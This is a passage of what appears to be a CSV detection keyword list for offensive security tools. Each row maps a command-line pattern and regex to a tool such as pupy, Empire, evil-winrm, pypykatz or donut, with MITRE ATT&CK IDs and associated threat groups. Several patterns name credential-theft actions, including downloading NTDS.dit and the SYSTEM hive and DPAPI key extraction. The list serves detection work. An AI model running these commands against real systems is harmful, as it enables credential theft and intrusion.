domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","916" "* domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","917" "* domcon-brute.nse*",".{0,1000}\sdomcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","918" "* domcon-cmd.nse*",".{0,1000}\sdomcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","919" "* dome.py*",".{0,1000}\sdome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","920" "* domino-enum-users.nse*",".{0,1000}\sdomino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","921" "* -DoNotPersistImmediately *",".{0,1000}\s\-DoNotPersistImmediately\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","923" "* --dont-enumerate-acls *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","925" "* --dont-enumerate-acls * -e *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","926" "* --dont-spoof *",".{0,1000}\s\-\-dont\-spoof\s.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","927" "* --dont-spoof-for *",".{0,1000}\s\-\-dont\-spoof\-for\s.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","928" "* --donut --rehash n --silent -o /tmp/*",".{0,1000}\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from 
impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","929" "* donut.c *",".{0,1000}\sdonut\.c\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","930" "* donut.exe *",".{0,1000}\sdonut\.exe\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","931" "* donut.o *",".{0,1000}\sdonut\.o\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","932" "* --donut-cmdline *",".{0,1000}\s\-\-donut\-cmdline\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","933" "* --dotnetassembly * --amsi*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-amsi.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","934" "* --dotnetassembly * --appdomain *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-appdomain\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - 
APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","935" "* --dotnetassembly * --assemblyargs *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-assemblyargs\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - 
Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","936" "* --dotnetassembly * --mailslot*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-mailslot.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 
Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","937" "* --dotnetassembly * --pipe *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-pipe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - 
Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","938" "* --dotnetver * --payload * --sandbox *",".{0,1000}\s\-\-dotnetver\s.{0,1000}\s\-\-payload\s.{0,1000}\s\-\-sandbox\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","939" "* -Downgrade False -Restore False -Impersonate True * -challange *",".{0,1000}\s\-Downgrade\sFalse\s\-Restore\sFalse\s\-Impersonate\sTrue\s.{0,1000}\s\-challange\s.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","940" "* download *\NTDS\NTDS.dit*",".{0,1000}\sdownload\s.{0,1000}\\NTDS\\NTDS\.dit.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. 
Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","941" "* download *\Windows\System32\config\SYSTEM*",".{0,1000}\sdownload\s.{0,1000}\\Windows\\System32\\config\\SYSTEM.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","N/A","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","942" "* Download_Cradles.hta*",".{0,1000}\sDownload_Cradles\.hta.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","943" "* Download_Cradles.ps1*",".{0,1000}\sDownload_Cradles\.ps1.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","944" "* dpap-brute.nse*",".{0,1000}\sdpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","947" "* dpapi blob *.json *.dat*",".{0,1000}\sdpapi\sblob\s.{0,1000}\.json\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","948" "* dpapi credential *.json cred*",".{0,1000}\sdpapi\scredential\s.{0,1000}\.json\scred.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","949" "* dpapi masterkey /root/*",".{0,1000}\sdpapi\smasterkey\s\/root\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","950" "* dpapi minidump *.dmp*",".{0,1000}\sdpapi\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","951" "* dpapi prekey nt *S-1-5-21*",".{0,1000}\sdpapi\sprekey\snt\s.{0,1000}S\-1\-5\-21.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","952" "* dpapi prekey password *",".{0,1000}\sdpapi\sprekey\spassword\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","953" "* dpapi prekey registry *.reg*",".{0,1000}\sdpapi\sprekey\sregistry\s.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","954" "* dpapi securestring *.dat*",".{0,1000}\sdpapi\ssecurestring\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","955" "* Dpapi.ps1*",".{0,1000}\sDpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - 
